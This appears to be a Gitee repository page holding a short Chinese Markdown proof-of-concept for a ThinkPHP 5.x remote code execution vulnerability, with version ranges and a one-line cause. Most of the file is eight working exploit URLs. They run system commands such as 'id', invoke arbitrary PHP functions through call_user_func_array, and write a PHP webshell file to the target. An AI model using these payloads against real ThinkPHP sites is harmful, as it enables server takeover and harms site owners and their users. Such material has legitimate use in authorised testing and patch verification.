1 Star 0 Fork 9

xiaohuzi123 / Penetration_Testing_POC

加入 Gitee
与超过 1200万 开发者一起发现、参与优秀开源项目,私有仓库也完全免费 :)
免费加入
克隆/下载
thinkphp5框架缺陷导致远程代码执行.md 1.45 KB
一键复制 编辑 原始数据 按行查看 历史
mr-xn 提交于 2019-07-26 14:42 . upload

漏洞简介

漏洞名称 上报日期 漏洞发现者 产品首页 软件链接 版本 CVE编号
thinkphp5框架缺陷导致远程代码执行 2018-10-10 unknown http://www.thinkphp.cn/ 下载连接 5.x < 5.1.31, <= 5.0.23 详情

漏洞概述

由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞

poc

http://192.168.99.98:7878/?s=index/\think\Request/input&filter=phpinfo&data=1
http://192.168.99.98:7878/?s=index/\think\Request/input&filter=system&data=id
http://192.168.99.98:7878/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
http://192.168.99.98:7878/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
http://192.168.99.98:7878/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
http://192.168.99.98:7878/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
http://192.168.99.98:7878/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
http://192.168.99.98:7878/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
1
https://gitee.com/haoguniang/Penetration_Testing_POC.git
git@gitee.com:haoguniang/Penetration_Testing_POC.git
haoguniang
Penetration_Testing_POC
Penetration_Testing_POC
master

搜索帮助